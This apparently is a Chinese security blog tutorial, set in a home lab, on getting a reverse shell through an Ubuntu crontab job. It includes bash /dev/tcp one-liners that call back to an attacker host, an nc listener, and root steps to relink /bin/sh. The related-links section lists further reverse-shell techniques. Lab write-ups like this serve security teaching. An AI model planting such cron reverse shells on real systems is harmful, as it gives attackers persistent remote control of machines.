Ubuntu计划任务反弹shell

最新推荐文章于 2024-05-26 22:29:50 发布
最新推荐文章于 2024-05-26 22:29:50 发布
阅读量4.1k 收藏 9
点赞数 2
分类专栏: web安全 文章标签: Ubuntu计划任务反弹shell
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/sdb5858874/article/details/81837440
版权

首先介绍一下实验环境

1.被攻击者:Ubuntu 192.168.0.8

2.攻击者:kali  192.168.0.127

 

首先第一步在Ubuntu系统下添加crontab 计划任务

* * * * * bash -i  >& /etc/tcp/192.168.0.127/8888 0>&1

 

第二步在kali系统下使用nc命令监听8888端口

nc -lp 8888

nc -l 开启监听

nc - p 指定端口

可是等了半天我的Kali并没有成功收到shell

 

那么我们查看一下Ubuntu这边的日志,看看问题出在哪里

tail -f /var/log/syslog

可以看到这边日志给出的错误信息是 No MTA installed,discarding output

 

经过kakaxi 和 ttgo2 两位老师的老师的指导,知道这句话的意思是

Ubuntu系统默认会将计划任务的错误信息以邮件的方式发送给用户,但是由于Ubuntu系统默认没有安装邮件系统,所以真正的报错信息并不是No MTA installed,discarding output这句话

想看到真正的报错信息有两种解决办法:

1.安装邮件系统

2.将计划任务的错误信息输出到一个文件内

 

这里我们介绍第2种方法:

首先我们去修改一下计划任务

crontab -e

* * * * * bash -i  '>& /dev/tcp/192.168.0.127/8888 0>&1'>/tmp/error.txt 2>&1

 

然后我们过一分钟去文件error.txt查看报错信息

这条错误的意思说/bin/bash没有被找到,通过错误信息还可以明白一件事情,那就是linux里面的cron中command执行的shell环境是/bin/sh,那我们可以再来看一下ubuntu下的/bin/sh文件究极是一个怎么样的文件

 

ls -l | grep -w “sh”

可以看到/bin/sh 文件实际上是一个软链接文件,他指向的是dash这个shell

而实际上dash这个shell只有运行脚本的能力,而没有交互能力。

这里我们只需要将修改sh的软链接为bash即可

ln - s -f bash /bin/sh

这里需要注意:普通用户是没有权限修改之前的软链接的,在这里我们需要提升到root权限

用到的命令是sudo -i 然后输入自己普通账号的密码即可。

此时我们已经将/bin/sh的软链接成功修改为bash

 

解决完这个问题之后我们再回到任务计划里,重新书写任务计划(注意:反弹shell依然需要root权限)

 

最后我们观察kali系统,发现已经成功反弹回shell

 

总结一下:Ubuntu下计划任务反弹shell需要注意的事项

1.需要用root权限书写计划

2.书写crontab计划的时候要将/bin/sh 软链接到 /bin/bash 

 

当然我们也可以不修改/bin/sh的软链接
直接将反弹shell的语句写入脚本,然后crontab任务定时执行脚本就可以

具体操作如下
先将/bin/sh的链接修改为/bin/dash

 

然后我在/var目录下创建了一个脚本cronshell,并赋予它执行权限

 

之后修改计划任务

 

kali退出shell并重新监听8888端口

 

实验成功

 

 

 

白帽梦想家
关注
  • 2
    点赞
  • 9
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
反弹Shell,看这一篇就够了
Appleteachers的博客
04-24 1140
前言 在渗透测试实战中,我们经常会遇到Linux系统环境,而让Linux主机反弹shell是再常见不过的事情了。 反弹shell,就是攻击机监听在某个TCP/UDP端口为服务端,目标机主动发起请求到攻击机监听的端口,并将其命令行的输入输出转到攻击机。 正向连接 假设我们攻击了一台机器,打开了该机器的一个端口,攻击者在自己的机器去连接目标机器(目标ip:目标机器端口),这是比较常规的形式,我们叫做正向连接。远程桌面、web服务、ssh、telnet等等都是正向连接。 反向连接 那么为什么要用反弹shell
Ubuntu常用Shell命令.xmind
06-28
Ubuntu常用Shell命令.xmind
反弹shell与提权】
一纸荒芜的博客
08-01 1945
网安面试常见问题
反弹shell详细易懂讲解,看这一篇就够了
最新发布
LCW991207的博客
05-26 1299
bash就是shell的众多小弟中的一个,Shell 是操作系统中提供用户与内核之间交互的一种界面,一个 解释型的程序设计语言,它的小弟有很多,它既可以是图形用户界面(GUI),也可以是命令行界面(CLI)。Shell 主要用于接受用户输入的命令并将其传递给操作系统的内核执行,同时将内核的输出结果返回给用户。
Ubuntu计划任务反弹shell提权
Longwaer
01-03 1669
学习Ubuntu计划任务反弹shell原理,了解掌握Linux提权新技巧。
ubuntu计划任务反弹shell
秋水的博客
10-01 2357
实验环境 ubuntu 14.04 x64位:192.168.1.115 kali/win10:192.168.1.108/107 所用工具:netcat(瑞士军刀) 计划任务 至于计划任务是什么我觉大不需要太多解释,就是定时执行任务的意思那么接下来看看计划任务的格式,以及书写 crond 是linux用来定期执行程序的命令,如果未安装需要先安装,不在多说 cron服务提供cr...
redis计划任务反弹shell
干铮的博客
01-31 2815
1.环境搭建 Ubuntu16.04安装redis sudo apt-get install redis-server vim /etc/redis/redis.conf 注释掉密码和仅允许本地访问 kali 安装redis-cli进行连接 wget http://download.redis.io/redis-stable.tar.gz tar -zxvf redis-stable.tar.gz cd redis-stable make //全局生效 cp src/redis
网络安全——redis未授权访问漏洞写入计划任务反弹shell
Demo不是emo的博客
09-17 5612
redis的未授权访问漏洞,顾名思义,就是不需要输入账密就可以直接登录(含redis服务安装包分享),本文介绍了怎么利用该漏洞获取目标shell
Ubuntu计划任务_crontab
11-23
如何定时启动shell脚本 写好shell 脚本 创建和编辑 crontab 文件 验证 crontab 文件是否存在
ubuntu服务器上设置定时任务
12-22
Ubuntu服务器上设置定时任务是运维工作中不可或缺的一部分,它能够自动化执行各种周期性的任务...正确理解和使用`crontab`语法,以及合理配置日志,能确保定时任务按计划执行,从而提高服务器管理效率和系统可靠性。
ubuntu:用于自动Ubuntu服务器设置的Shell脚本
02-06
ubuntu:用于自动Ubuntu服务器设置的Shell脚本
Ubuntu下新建shell文件.txt
02-22
Ubuntu下新建shell文件,我妈看了都会
linux定时计划反弹shell
niqiu320的博客
05-26 2223
crontab crontab命令常见于Unix和Linux的操作系统之中,用于设置周期性被执行的指令。该命令从标准输入设备读取指令,并将其存放于“crontab”文件中,以供之后读取和执行。通常,crontab储存的指令被守护进程激活。crond 常常在后台运行,每一分钟检查是否有预定的作业需要执行。这类作业一般称为cron jobs。 安装(默认自带crontab) yum -y install vixie-cron yum -y install crontabs 说明: vixie-cron 软件包
Ubuntu使用crontab使用反弹shell问题处理
SHELLCODE_8BIT的博客
12-15 707
原因是在ubuntu下crontab启动默认使用dash来启动,而在dash启动会失败,我们可以来尝试一下。使用dash启动,会直接报如下错误。在ubuntu环境下做攻击时,会遇到下列情况,使用crontab写入如下命令反弹,会失败。ubuntu反弹SHELL正确用法是。
linux设置定时弹框,【奇技淫巧】linux 定时任务 crontab 反弹 shell
weixin_39736047的博客
05-14 270
日期:2018-11-26 13:47:34介绍:如何使用定时任务来反弹 shell?0x01、 基本命令参数-e:编辑该用户的计时器设置;-l:列出该用户的计时器设置;-r:删除该用户的计时器设置;-u :指定要设定计时器的用户名称。MAC 直接使用 crontab -e 无效:编辑 username 的 crontab$ sudo crontab -u username -e列出 userna...
Ubuntu添加计划任务
weixin_30765319的博客
11-08 782
1、安装cron apt-get install cron 2、启动服务 启动服务方式和linxu6类似 /etc/init.d/cron start 重启 /etc/init.d/cron restart 3、添加计划任务 普通用户执行crontab -e 则进入nano单用户文件模式,所以建议用root用户去创建任务 4、用root用户添加计划任务 root用户首次使用c...
Ubuntu计划任务使用(crontab)
D_R_L_T的博客
08-13 284
1. crontab 语法格式: f1    f2    f3    f4    f5    program  其中 f1 是表示分钟,f2 表示小时,f3 表示一个月份中的第几日,f4 表示月份,f5 表示一个星期中的第几天。program 表示要执行的程序。  当 f1 为 * 时表示每分钟都要执行 program,f2 为 * 时表示每小时都要执行程序,其余类推 ; 当 f1 为 a-b ...
apache-CVE-2021-41773[42013]-反弹shell
csd_ct的专栏
02-06 1801
CVE-2021-41773-反弹shell apache-CVE-2021-41773/42013 中存在RCE,可远程执行代码,本想利用bash反弹一个shell,奈何一直没有成功 ‘’’ bash -i >& /de/tcp/ip/port 0>&1 ‘’’ 经典的bash反弹,确定环境和语句都没问题后,本地查看了靶机的日志,看到有如下报错, 很奇怪,为什么会有一个syntax error:Bad fd number的错误呢,而在本地kali中直接执行该语句,是没有问题的
浅谈反弹shell
weixin_53284312的博客
01-12 2311
反弹shell
redis写任务计划反弹shell
09-15
根据提供的引用内容,Redis可以通过计划任务反弹shell。具体步骤如下: 1. 在Redis服务器上创建一个计划任务。可以使用CRON表达式来指定计划任务的执行时间。 2. 在计划任务中编写一段脚本,用于反弹shell到黑客主机上。脚本内容可以包括反弹shell的命令和目标主机的IP地址和端口号。 3. 将该计划任务设置为root用户权限,以便执行反弹shell操作。 需要注意的是,这个方法在CentOS操作系统下通常是可行的,但在Ubuntu系统下可能不适用。此外,在Windows系统上安装Redis并进行此操作的情况相对较少。 希望这个回答解决了你的问题。如有其他问题,请随时提问。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值